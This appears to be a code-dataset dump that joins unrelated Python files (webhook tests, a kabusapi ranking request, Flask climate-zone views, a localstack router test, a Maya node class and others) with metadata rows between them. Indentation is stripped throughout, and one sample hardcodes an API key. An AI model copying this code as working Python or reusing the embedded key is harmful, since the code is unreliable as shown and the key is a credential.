ret, image = cv2.threshold(dst, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
return image
def resize_padding(image, height, width):
# resize
h, w, c = image.shape
image = cv2.resize(image, (0, 0), fx=height / h, fy=height / h, interpolation=cv2.INTER_LINEAR)
# padding
h, w, c = image.shape
img = 255. * np.ones((height, width, c))
if w < width:
img[:, :w, :] = image
else:
r = height / h
img = cv2.resize(image, (0, 0), fx=r, fy=r, interpolation=cv2.INTER_LINEAR)
return img
def padding_image_batch(image_batch, height=32, width=480):
aspect_ratios = []
for image in image_batch:
h, w, c = image.shape
aspect_ratios.append(w/h)
max_len = int(np.ceil(32 * max(aspect_ratios)))
pad_len = max_len if max_len > width else width
imgs = []
for image in image_batch:
img = resize_padding(image, height, pad_len)
img = np.transpose(img, (2, 0, 1))
imgs.append(img)
img_batch = torch.from_numpy(np.array(imgs)) / 255.
return img_batch.float()
logger_initialized = {}
def get_logger(name, log_file=None, log_level=logging.INFO):
"""Initialize and get a logger by name.
If the logger has not been initialized, this method will initialize the
logger by adding one or two handlers, otherwise the initialized logger will
be directly returned. During initialization, a StreamHandler will always be
added. If `log_file` is specified and the process rank is 0, a FileHandler
will also be added.
Args:
name (str): Logger name.
log_file (str | None): The log filename. If specified, a FileHandler
will be added to the logger.
log_level (int): The logger level. Note that only the process of
rank 0 is affected, and other processes will set the level to
"Error" thus be silent most of the time.
Returns:
logging.Logger: The expected logger.
"""
logger = logging.getLogger(name)
if name in logger_initialized:
return logger
# handle hierarchical names
# e.g., logger "a" is initialized, then logger "a.b" will skip the
# initialization since it is a child of "a".
for logger_name in logger_initialized:
if name.startswith(logger_name):
return logger
stream_handler = logging.StreamHandler()
handlers = [stream_handler]
if dist.is_available() and dist.is_initialized(): # True False
rank = dist.get_rank()
else:
rank = 0
# only rank 0 will add a FileHandler
if rank == 0 and log_file is not None:
file_handler = logging.FileHandler(log_file, 'w')
handlers.append(file_handler)
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
for handler in handlers:
handler.setFormatter(formatter)
handler.setLevel(log_level)
logger.addHandler(handler)
if rank == 0:
logger.setLevel(log_level)
else:
logger.setLevel(logging.ERROR)
logger_initialized[name] = True
return logger
| 31.582133
| 136
| 0.57195
| 1,502
| 10,959
| 4.066578
| 0.225033
| 0.008841
| 0.007204
| 0.008841
| 0.106745
| 0.067453
| 0.057629
| 0.047806
| 0.047806
| 0.047806
| 0
| 0.019458
| 0.29656
| 10,959
| 346
| 137
| 31.67341
| 0.772863
| 0.203029
| 0
| 0.109091
| 0
| 0
| 0.036989
| 0.002836
| 0
| 0
| 0
| 0
| 0.013636
| 1
| 0.118182
| false
| 0
| 0.040909
| 0
| 0.272727
| 0.009091
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34a704c37474e7d90bc81f141c9416313e5a36b0
| 3,912
|
py
|
Python
|
tests/unit_tests/webhook_server_test.py
|
Leanny/mmpy_bot
|
fd16db4f1b07130fbf95568fb242387f0c7973e2
|
[
"MIT"
] | 196
|
2018-05-31T23:45:34.000Z
|
2022-03-20T09:06:55.000Z
|
tests/unit_tests/webhook_server_test.py
|
Leanny/mmpy_bot
|
fd16db4f1b07130fbf95568fb242387f0c7973e2
|
[
"MIT"
] | 216
|
2018-05-31T19:18:46.000Z
|
2022-03-21T17:09:38.000Z
|
tests/unit_tests/webhook_server_test.py
|
tgly307/mmpy_bot
|
0ae52d9db86ac018f3d48dd52c11e4996f549073
|
[
"MIT"
] | 107
|
2018-06-01T05:12:27.000Z
|
2022-02-25T12:40:10.000Z
|
import asyncio
import threading
import time
import pytest
from aiohttp import ClientSession
from mmpy_bot import Settings
from mmpy_bot.threadpool import ThreadPool
from mmpy_bot.webhook_server import NoResponse, WebHookServer
@pytest.fixture(scope="function")
def threadpool():
pool = ThreadPool(num_workers=1)
yield pool
pool.stop() # if the pool was started, stop it.
class TestWebHookServer:
def test_start(self, threadpool):
# Test server startup with a different port so it won't clash with the
# integration tests
server = WebHookServer(port=3281, url=Settings().WEBHOOK_HOST_URL)
threadpool.start_webhook_server_thread(server)
threadpool.start()
time.sleep(0.5)
assert server.running
asyncio.set_event_loop(asyncio.new_event_loop())
# Run the other tests sequentially
self.test_obtain_response(server)
self.test_process_webhook(server)
# Test shutdown procedure
threadpool.stop()
assert not server.running
@pytest.mark.skip("Called from test_start since we can't parallellize this.")
def test_obtain_response(self, server):
assert server.response_handlers == {}
# Wait for a response for request id 'test
await_response = asyncio.get_event_loop().create_future()
server.response_handlers["test"] = await_response
assert not server.response_handlers["test"].done()
# We have no futures waiting for request id 'nonexistent', so nothing should
# happen.
server.response_queue.put(("nonexistent", None))
time.sleep(0.1)
assert not server.response_handlers["test"].done()
# If a response comes in for request id 'test', it should be removed from the
# response handlers dict.
server.response_queue.put(("test", None))
time.sleep(0.1)
assert "test" not in server.response_handlers
@pytest.mark.skip("Called from test_start since we can't parallellize this.")
def test_process_webhook(self, server):
"""Checks whether an incoming webhook post request is correctly handled."""
assert server.event_queue.empty()
assert server.response_queue.empty()
assert server.response_handlers == {}
async def send_request(data):
async with ClientSession() as session:
try:
response = await session.post(
f"{server.url}:{server.port}/hooks/test_hook",
json=data,
timeout=1,
)
return await response.json()
except asyncio.exceptions.TimeoutError:
return None
asyncio.run(send_request({"text": "Hello!"}))
# Verify that a WebHookEvent corresponding to our request was added to the
# event queue.
assert server.event_queue.qsize() == 1
event = server.event_queue.get_nowait()
assert event.webhook_id == "test_hook"
assert event.text == "Hello!"
# Since there is no MessageHandler, we have to signal the server ourselves
server.response_queue.put((event.request_id, NoResponse))
time.sleep(0.1)
# Upon receiving the NoResponse, the server should have emptied the response
# queue and handlers.
assert server.response_queue.empty()
assert server.response_handlers == {}
# Test whether the web response is correctly passed through, if there is one
response = {"text": "test response"}
def provide_response():
event = server.event_queue.get()
server.response_queue.put((event.request_id, response))
thread = threading.Thread(target=provide_response)
thread.start()
assert asyncio.run(send_request({"text": "Hello!"})) == response
| 37.257143
| 85
| 0.648773
| 467
| 3,912
| 5.310493
| 0.325482
| 0.073387
| 0.062097
| 0.041935
| 0.223387
| 0.2
| 0.16129
| 0.100806
| 0.100806
| 0.054032
| 0
| 0.005214
| 0.264571
| 3,912
| 104
| 86
| 37.615385
| 0.856795
| 0.204755
| 0
| 0.173913
| 0
| 0
| 0.079288
| 0.013592
| 0
| 0
| 0
| 0
| 0.217391
| 1
| 0.072464
| false
| 0
| 0.115942
| 0
| 0.231884
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34a7b81a028bf0267f44066f902a91829b99db68
| 1,023
|
py
|
Python
|
sample/Python/kabusapi_ranking.py
|
HolyMartianEmpire/kabusapi
|
c88ee958c272fb6e1dfde9a256e138c5760ea545
|
[
"MIT"
] | 212
|
2020-08-20T09:10:35.000Z
|
2022-03-31T08:05:21.000Z
|
sample/Python/kabusapi_ranking.py
|
U2u14/kabusapi
|
e41d0c3fcbcf6a1164ace9eac1a4d93685012dcb
|
[
"MIT"
] | 496
|
2020-08-20T14:23:59.000Z
|
2022-03-31T23:59:09.000Z
|
sample/Python/kabusapi_ranking.py
|
U2u14/kabusapi
|
e41d0c3fcbcf6a1164ace9eac1a4d93685012dcb
|
[
"MIT"
] | 57
|
2020-08-20T10:40:07.000Z
|
2022-03-07T06:28:01.000Z
|
import urllib.request
import json
import pprint
url = 'http://localhost:18080/kabusapi/ranking' #?type=1&ExchangeDivision=ALL
params = { 'type': 15 } #type - 1:値上がり率(デフォルト)2:値下がり率 3:売買高上位 4:売買代金 5:TICK回数 6:売買高急増 7:売買代金急増 8:信用売残増 9:信用売残減 10:信用買残増 11:信用買残減 12:信用高倍率 13:信用低倍率 14:業種別値上がり率 15:業種別値下がり率
params['ExchangeDivision'] = 'S' #ExchangeDivision - ALL:全市場(デフォルト)T:東証全体 T1:東証一部 T2:東証二部 TM:マザーズ JQ:JASDAQ M:名証 FK:福証 S:札証
req = urllib.request.Request('{}?{}'.format(url, urllib.parse.urlencode(params)), method='GET')
req.add_header('Content-Type', 'application/json')
req.add_header('X-API-KEY', 'f2a3579e776f4b6b8015a96c8bdafdce')
try:
with urllib.request.urlopen(req) as res:
print(res.status, res.reason)
for header in res.getheaders():
print(header)
print()
content = json.loads(res.read())
pprint.pprint(content)
except urllib.error.HTTPError as e:
print(e)
content = json.loads(e.read())
pprint.pprint(content)
except Exception as e:
print(e)
| 39.346154
| 170
| 0.69697
| 152
| 1,023
| 4.677632
| 0.625
| 0.054852
| 0.033755
| 0.064698
| 0.081575
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 0.155425
| 1,023
| 25
| 171
| 40.92
| 0.767361
| 0.256109
| 0
| 0.173913
| 0
| 0
| 0.180739
| 0.042216
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.130435
| 0
| 0.130435
| 0.347826
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34a95de29250fa6c98650b9aff0293a9f1a7b915
| 3,905
|
py
|
Python
|
sfa_api/zones.py
|
lboeman/solarforecastarbiter-api
|
9df598b5c638c3e36d0649e08e955b3ddc1b542d
|
[
"MIT"
] | 7
|
2018-12-07T22:05:36.000Z
|
2020-05-03T03:20:50.000Z
|
sfa_api/zones.py
|
lboeman/solarforecastarbiter-api
|
9df598b5c638c3e36d0649e08e955b3ddc1b542d
|
[
"MIT"
] | 220
|
2018-11-01T23:33:19.000Z
|
2021-12-02T21:06:38.000Z
|
sfa_api/zones.py
|
lboeman/solarforecastarbiter-api
|
9df598b5c638c3e36d0649e08e955b3ddc1b542d
|
[
"MIT"
] | 3
|
2018-10-31T20:55:07.000Z
|
2021-11-10T22:51:43.000Z
|
from flask import Blueprint, jsonify, make_response
from flask.views import MethodView
from sfa_api import spec, json
from sfa_api.schema import ZoneListSchema
from sfa_api.utils.storage import get_storage
from sfa_api.utils.request_handling import validate_latitude_longitude
class AllZonesView(MethodView):
def get(self, *args):
"""
---
summary: List climate zones
description: List all climate zones that the user has access to.
tags:
- Climate Zones
responses:
200:
description: A list of climate zones.
content:
application/json:
schema:
type: array
items:
$ref: '#/components/schemas/ZoneMetadata'
401:
$ref: '#/components/responses/401-Unauthorized'
"""
storage = get_storage()
zones = storage.list_zones()
return jsonify(ZoneListSchema(many=True).dump(zones))
class ZoneView(MethodView):
def get(self, zone, *args):
"""
---
summary: Get zone GeoJSON
description: Get the GeoJSON for a requested climate zone.
tags:
- Climate Zones
parameters:
- zone
responses:
200:
description: The GeoJSON definition for the climate zone
content:
application/geo+json:
schema:
type: object
401:
$ref: '#/components/responses/401-Unauthorized'
404:
$ref: '#/components/responses/404-NotFound'
"""
storage = get_storage()
geojson = storage.read_climate_zone(zone.replace('+', ' '))
response = make_response(json.dumps(geojson), 200)
response.mimetype = 'application/geo+json'
return response
class SearchZones(MethodView):
def get(self, *args):
"""
---
summary: Find zones
description: Find all zones that the given point falls within
tags:
- Climate Zones
parameters:
- latitude
- longitude
responses:
200:
description: Sucessfully retrieved zones.
content:
application/json:
schema:
type: array
items:
$ref: '#/components/schemas/ZoneMetadata'
400:
$ref: '#/components/responses/400-BadRequest'
401:
$ref: '#/components/responses/401-Unauthorized'
"""
lat, lon = validate_latitude_longitude()
storage = get_storage()
zones = storage.find_climate_zones(lat, lon)
return jsonify(ZoneListSchema(many=True).dump(zones))
spec.components.parameter(
'zone', 'path',
{
'schema': {
'type': 'string',
},
'description': "Climate zone name. Spaces may be replaced with +.",
'required': 'true',
'name': 'zone'
})
spec.components.parameter(
'latitude', 'query',
{
'name': 'latitude',
'required': True,
'description': 'The latitude (in degrees North) of the location.',
'schema': {
'type': 'float',
}
})
spec.components.parameter(
'longitude', 'query',
{
'name': 'longitude',
'required': True,
'description': 'The longitude (in degrees East of the Prime Meridian)'
' of the location.',
'schema': {
'type': 'float',
}
})
zone_blp = Blueprint(
'climatezones', 'climatezones', url_prefix='/climatezones',
)
zone_blp.add_url_rule('/', view_func=AllZonesView.as_view('all'))
zone_blp.add_url_rule('/<zone_str:zone>', view_func=ZoneView.as_view('single'))
zone_blp.add_url_rule('/search', view_func=SearchZones.as_view('search'))
| 29.141791
| 79
| 0.557746
| 374
| 3,905
| 5.721925
| 0.315508
| 0.039252
| 0.051402
| 0.028037
| 0.277103
| 0.226168
| 0.114953
| 0.073832
| 0.073832
| 0.073832
| 0
| 0.016135
| 0.333419
| 3,905
| 133
| 80
| 29.360902
| 0.805993
| 0.321639
| 0
| 0.327869
| 0
| 0
| 0.203421
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04918
| false
| 0
| 0.098361
| 0
| 0.245902
| 0.032787
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34abfc5ba2b2f363e90afe9dd53efcac19d00daf
| 1,228
|
py
|
Python
|
tests/unit/http_/test_adapters.py
|
matt-mercer/localstack
|
b69ba25e495c6ef889d33a050b216d0cd1035041
|
[
"Apache-2.0"
] | 1
|
2022-03-17T07:22:23.000Z
|
2022-03-17T07:22:23.000Z
|
tests/unit/http_/test_adapters.py
|
matt-mercer/localstack
|
b69ba25e495c6ef889d33a050b216d0cd1035041
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/http_/test_adapters.py
|
matt-mercer/localstack
|
b69ba25e495c6ef889d33a050b216d0cd1035041
|
[
"Apache-2.0"
] | null | null | null |
import requests
from localstack.http import Response, Router
from localstack.http.adapters import RouterListener
from localstack.utils.testutil import proxy_server
class TestRouterListener:
def test_dispatching(self):
def endpoint(request, args):
resp = Response()
resp.set_json({"args": args})
return resp
router = Router()
router.add("/foo/<bar>", endpoint, methods=["GET"])
with proxy_server(RouterListener(router, fall_through=False)) as url:
response = requests.get(f"{url}/foo/ed")
assert response.ok
assert response.json() == {"args": {"bar": "ed"}}
# test with query
response = requests.get(f"{url}/foo/bar?hello=there")
assert response.ok
assert response.json() == {"args": {"bar": "bar"}}
# test invalid endpoint
response = requests.get(f"{url}/foo")
assert not response.ok
assert response.status_code == 404
# test non-allowed method
response = requests.post(f"{url}/foo/bar")
assert not response.ok
assert response.status_code == 405 # method not allowed
| 33.189189
| 77
| 0.592834
| 137
| 1,228
| 5.262774
| 0.394161
| 0.116505
| 0.038835
| 0.133148
| 0.341193
| 0.341193
| 0.23301
| 0.23301
| 0
| 0
| 0
| 0.006904
| 0.292345
| 1,228
| 36
| 78
| 34.111111
| 0.822785
| 0.065147
| 0
| 0.16
| 0
| 0
| 0.083115
| 0.021872
| 0
| 0
| 0
| 0
| 0.32
| 1
| 0.08
| false
| 0
| 0.16
| 0
| 0.32
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34ac4b2375450822de672fe9deedac50930b777e
| 647
|
py
|
Python
|
setup.py
|
ZaneColeRiley/ArcherProject
|
7d9ecf4953e3ea8ce3577321449549743eada34e
|
[
"MIT"
] | null | null | null |
setup.py
|
ZaneColeRiley/ArcherProject
|
7d9ecf4953e3ea8ce3577321449549743eada34e
|
[
"MIT"
] | null | null | null |
setup.py
|
ZaneColeRiley/ArcherProject
|
7d9ecf4953e3ea8ce3577321449549743eada34e
|
[
"MIT"
] | null | null | null |
from cx_Freeze import setup, Executable
import sys
base = None
if sys.platform == "win32":
base = "Win32GUI"
executables = [Executable("Archer.py", base=base, icon="favicon.ico")]
setup(name="Archer",
version="1.0.0",
options={"build_exe": {"packages": ["tkinter", "mysql", "PIL", "time", "requests", "os", "smtplib", "datetime", "pyAesCrypt"], "include_files": ["Screen_image.jpg", "favicon.ico", "Admin_screen.jpg", "Screen_image_small.jpg", "Journal.jpg", "db.sqlite3"]}},
description="",
executables=executables, requires=['requests', 'PIL', 'mysql', "smtplib", "tkinter", "time", "pyAesCrypt"])
| 40.4375
| 264
| 0.638331
| 74
| 647
| 5.486486
| 0.648649
| 0.049261
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014572
| 0.151468
| 647
| 15
| 265
| 43.133333
| 0.724954
| 0
| 0
| 0
| 0
| 0
| 0.408228
| 0.03481
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.181818
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34ac94f8711db1745f63a3c064eaa86f3dde0de5
| 2,772
|
py
|
Python
|
WiSe-2122/Uebung-11/Gruppe-C/U11-A1.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | 1
|
2022-03-23T09:40:39.000Z
|
2022-03-23T09:40:39.000Z
|
WiSe-2122/Uebung-11/Gruppe-C/U11-A1.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | null | null | null |
WiSe-2122/Uebung-11/Gruppe-C/U11-A1.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | null | null | null |
# Übung 11 - Aufgabe 1
# Mitarbeiter-Kartei
# Bereitgestellt von M. Drews im Wintersemester 2021/22
# Funktionen
def trenner(anzahl_striche):
for i in range(anzahl_striche):
print("-", end="")
print()
def fehler():
print("\nFehler: Bitte geben Sie nur Zahlen an, die zur Auswahl stehen.")
def formular():
global vorname, nachname, geburtsort
vorname = input("> Vorname: ")
nachname = input("> Nachname: ")
geburtsort = input("> Geburtsort: ")
def suche():
global index
suche = input("Suchbegriff (Nachname eingeben): ")
index = next((i for i, item in enumerate(ma_kartei) if item["Nachname"] == suche), None)
def eintrag_neu():
print("\nBitte fügen Sie einen neuen Eintrag zur Mitarbeiter-Kartei hinzu: ")
formular()
gueltige_eingabe = False
while not gueltige_eingabe:
try:
auswahl = int(input("\n(1) Speichern (2) Abbrechen\n"))
if auswahl == 1:
gueltige_eingabe = True
eintrag = {"Vorname": vorname,"Nachname": nachname,"Geburtsort": geburtsort}
ma_kartei.append(eintrag)
print("Ihr Eintrag wurde gespeichert und der Kartei hinzugefügt.")
trenner(80)
elif auswahl == 2:
gueltige_eingabe = True
except:
fehler()
def eintrag_bearbeiten():
print("Welchen Eintrag möchten Sie bearbeiten?")
suche()
print("\nBitte überschreiben Sie den alten Eintrag:")
formular()
ma_kartei[index] = {"Vorname": vorname,"Nachname": nachname,"Geburtsort": geburtsort}
print("Ihr Eintrag wurde gespeichert und der Kartei hinzugefügt.")
trenner(80)
def eintrag_loeschen():
print("Welchen Eintrag möchten Sie löschen?")
suche()
print("\nFolgender Eintrag wurde gelöscht:")
print(ma_kartei[index])
ma_kartei.pop(index)
# Programmablauf
print("\n")
trenner(120)
print("Mitarbeiter-Kartei")
trenner(120)
trenner(120)
ma_kartei = []
programm = True
while programm:
print("Was möchten Sie tun?")
gueltige_eingabe = False
while not gueltige_eingabe:
try:
auswahl = int(input("\n(1) Eintrag hinzufügen\n(2) Eintrag bearbeiten\n(3) Eintrag löschen\n(4) Kartei anzeigen\n"))
if auswahl == 1:
gueltige_eingabe = True
eintrag_neu()
elif auswahl == 2:
gueltige_eingabe = True
eintrag_bearbeiten()
elif auswahl == 3:
gueltige_eingabe = True
eintrag_loeschen()
elif auswahl == 4:
gueltige_eingabe = True
print(ma_kartei)
trenner(80)
except:
fehler()
| 28.875
| 128
| 0.599206
| 298
| 2,772
| 5.489933
| 0.342282
| 0.091687
| 0.069682
| 0.06357
| 0.333741
| 0.298289
| 0.199267
| 0.199267
| 0.154034
| 0.154034
| 0
| 0.018414
| 0.294733
| 2,772
| 95
| 129
| 29.178947
| 0.818414
| 0.042929
| 0
| 0.432432
| 0
| 0.013514
| 0.263317
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.094595
| false
| 0
| 0
| 0
| 0.094595
| 0.202703
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34af79c82e2f03fa8bacfe2aa4a2b6da7ce9ee22
| 20,230
|
py
|
Python
|
asciinode.py
|
bhsingleton/mason
|
9a14cdc758b7ef76e53d4ef9d30045834d6c17ef
|
[
"MIT"
] | 1
|
2021-09-08T00:51:52.000Z
|
2021-09-08T00:51:52.000Z
|
asciinode.py
|
bhsingleton/mason
|
9a14cdc758b7ef76e53d4ef9d30045834d6c17ef
|
[
"MIT"
] | null | null | null |
asciinode.py
|
bhsingleton/mason
|
9a14cdc758b7ef76e53d4ef9d30045834d6c17ef
|
[
"MIT"
] | null | null | null |
import maya.api.OpenMaya as om
from . import asciitreemixin, asciiattribute, asciiplug
from .collections import hashtable, weakreflist, notifylist
import logging
logging.basicConfig()
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
class AsciiNode(asciitreemixin.AsciiTreeMixin):
"""
Overload of AsciiTreeMixin used to interface with scene nodes.
"""
__slots__ = (
'_scene',
'_name',
'_namespace',
'_uuid',
'_type',
'_parent',
'_children',
'_locked',
'_default',
'_attributes',
'_plugs',
'_database',
'_connections'
)
__attributes__ = {} # Used for static attributes
def __init__(self, typeName, **kwargs):
"""
Private method called after a new instance is created.
:type typeName: str
:keyword scene: asciiscene.AsciiScene
:rtype: None
"""
# Call parent method
#
super(AsciiNode, self).__init__()
# Declare private variables
#
self._scene = kwargs.get('scene', self.nullWeakReference)
self._name = ''
self._namespace = ''
self._uuid = ''
self._type = typeName
self._parent = self.nullWeakReference
self._children = notifylist.NotifyList(cls=weakreflist.WeakRefList)
self._locked = False
self._attributes = hashtable.HashTable() # Used for dynamic attributes
self._plugs = hashtable.HashTable()
self._connections = []
self._default = kwargs.get('default', False)
# Setup child notifies
#
self._children.addCallback('itemAdded', self.childAdded)
self._children.addCallback('itemRemoved', self.childRemoved)
# Declare public variables
#
self.parent = kwargs.get('parent', None)
self.name = kwargs.get('name', '')
self.namespace = kwargs.get('namespace', '')
self.uuid = kwargs.get('uuid', om.MUuid().generate().asString())
# Initialize node attributes
#
self.initialize()
def __str__(self):
"""
Private method that returns a string representation of this instance.
:rtype: str
"""
return f'<{self.__class__.__module__}.{self.__class__.__name__} object: {self.absoluteName()}>'
def __getitem__(self, key):
"""
Private method that returns the plug associated with the supplied key.
:type key: str
:rtype: asciiplug.AsciiPlug
"""
return self.findPlug(key)
def __dumps__(self):
"""
Returns a list of command line strings that can be serialized.
:rtype: list[str]
"""
# Evaluate which commands to concatenate
#
commands = []
if self.isDefaultNode:
commands.append(self.getSelectCmd())
else:
commands.append(self.getCreateNodeCmd())
commands.append(self.getRenameCmd())
# Concatenate lockNode command
# But only if the node has actually been locked!
#
if self.isLocked:
commands.append(self.getLockNodeCmd())
# Concatenate attribute related commands
#
commands.extend(self.getAddAttrCmds())
commands.extend(self.getSetAttrCmds())
return commands
@property
def scene(self):
"""
Returns the scene this object is derived from.
:rtype: mason.asciiscene.AsciiScene
"""
return self._scene()
@property
def name(self):
"""
Getter method that returns the name of this node.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Setter method updates the name of this node.
:type name: str
:rtype: None
"""
# Check for redundancy
#
newName = self.stripAll(name)
oldName = self._name
if newName != oldName:
self._name = newName
self.nameChanged(oldName, newName)
def nameChanged(self, oldName, newName):
"""
Callback method for any name changes made to this node.
:type oldName: str
:type newName: str
:rtype: None
"""
# Remove previous name from registry
#
absoluteName = f'{self.namespace}:{oldName}'
hashCode = self.scene.registry.names.get(absoluteName, None)
if hashCode == self.hashCode():
del self.scene.registry.names[absoluteName]
# Append new name to registry
#
absoluteName = f'{self.namespace}:{newName}'
self.scene.registry.names[absoluteName] = self.hashCode()
@property
def namespace(self):
"""
Getter method that returns the namespace this node belongs to.
:rtype: str
"""
return self._namespace
@namespace.setter
def namespace(self, namespace):
"""
Setter method updates the namespace this node belongs to.
:type namespace: str
:rtype: None
"""
# Check for redundancy
#
oldNamespace = self._namespace
newNamespace = '' if namespace == ':' else namespace
if newNamespace != oldNamespace:
self._namespace = newNamespace
self.namespaceChanged(oldNamespace, newNamespace)
def namespaceChanged(self, oldNamespace, newNamespace):
"""
Callback method for any namespace changes made to this node.
:type oldNamespace: str
:type newNamespace: str
:rtype: None
"""
# Remove previous name from registry
#
absoluteName = f'{oldNamespace}:{self.name}'
hashCode = self.scene.registry.names.get(absoluteName, None)
if hashCode == self.hashCode():
del self.scene.registry.names[absoluteName]
# Append new name to registry
#
absoluteName = f'{newNamespace}:{self.name}'
self.scene.registry.names[absoluteName] = self.hashCode()
def absoluteName(self):
"""
Returns the bare minimum required to be a unique name.
:rtype: str
"""
if len(self.namespace) > 0:
return f'{self.namespace}:{self.name}'
else:
return self.name
@property
def parent(self):
"""
Getter method that returns the parent for this object.
:rtype: AsciiNode
"""
return self._parent()
@parent.setter
def parent(self, parent):
"""
Setter method that updates the parent for this object.
:type parent: AsciiNode
:rtype: None
"""
# Check for redundancy
#
if parent is self.parent:
log.debug(f'{self} is already parented to: {parent}')
return
# Check for none type
#
oldParent = self.parent
if isinstance(parent, AsciiNode):
self._parent = parent.weakReference()
elif isinstance(parent, str):
self.parent = self.scene.registry.getNodeByName(parent)
elif parent is None:
self._parent = self.nullWeakReference
else:
raise TypeError(f'parent.setter() expects an AsciiNode ({type(parent).__name__} given)!')
# Cleanup any old references
#
self.parentChanged(oldParent, parent)
def parentChanged(self, oldParent, newParent):
"""
Callback method that cleans up any parent/child references.
:type oldParent: AsciiNode
:type newParent: AsciiNode
:rtype: None
"""
# Remove self from former parent
#
if oldParent is not None:
oldParent.children.remove(self)
# Append self to new parent
#
if newParent is not None:
newParent.children.appendIfUnique(self)
@property
def children(self):
"""
Getter method that returns the children belonging to this object.
:rtype: weakreflist.WeakRefList
"""
return self._children
def childAdded(self, index, child):
"""
Adds a reference to this object to the supplied child.
:type index: int
:type child: AsciiNode
:rtype: None
"""
if child.parent is not self:
child.parent = self
def childRemoved(self, child):
"""
Removes the reference of this object from the supplied child.
:type child: AsciiNode
:rtype: None
"""
child.parent = None
@property
def type(self):
"""
Getter method that returns the name of this node type.
:rtype: str
"""
return self._type
@property
def uuid(self):
"""
Getter method that returns the UUID for this node.
:rtype: str
"""
return self._uuid
@uuid.setter
def uuid(self, uuid):
"""
Setter method that updates the UUID for this node.
:type uuid: str
:rtype: None
"""
# Check for redundancy
#
newUUID = self.scene.registry.generateUUID(uuid)
oldUUID = self._uuid
if newUUID != oldUUID:
self._uuid = newUUID
self.uuidChanged(oldUUID, newUUID)
def uuidChanged(self, oldUUID, newUUID):
"""
Callback method for any namespace changes made to this node.
:type oldUUID: str
:type newUUID: str
:rtype: None
"""
# Remove previous uuid from registry
#
hashCode = self.scene.registry.uuids.get(oldUUID, None)
if hashCode == self.hashCode():
del self.scene.registry.uuids[oldUUID]
# Append new uuid to registry
#
self.scene.registry.uuids[newUUID] = self.hashCode()
@property
def isLocked(self):
"""
Getter method that returns the lock state of this node.
:rtype: int
"""
return self._locked
@isLocked.setter
def isLocked(self, locked):
"""
Setter method that updates the lock state of this node.
:type locked: bool
:rtype: None
"""
self._locked = bool(locked)
@property
def isDefaultNode(self):
"""
Getter method that evaluates whether this is a default node.
:rtype: bool
"""
return self._default
def initialize(self):
"""
Initializes the attributes and plugs for this node.
:rtype: None
"""
# Check if static attributes exist
# If not then go ahead and initialize them
#
attributes = self.__attributes__.get(self.type)
if attributes is None:
attributes = asciiattribute.listPlugin(self.type)
self.__attributes__[self.type] = attributes
@property
def database(self):
"""
Getter method that returns the database for this node.
:rtype: asciidatabase.AsciiDatabase
"""
return self._database
@property
def plugs(self):
"""
Getter method that returns the plugs that are currently in use.
:rtype: hashtable.HashTable
"""
return self._plugs
def iterTopLevelPlugs(self):
"""
Iterates through all of the top-level plugs.
Please note that plugs are created on demand so don't expect a complete list from this generator!
:rtype: iter
"""
# Iterate through attributes
#
for attribute in self.listAttr(fromPlugin=True, userDefined=True).values():
# Check if this is a top level parent
#
if attribute.parent is not None:
continue
# Yield associated plug
#
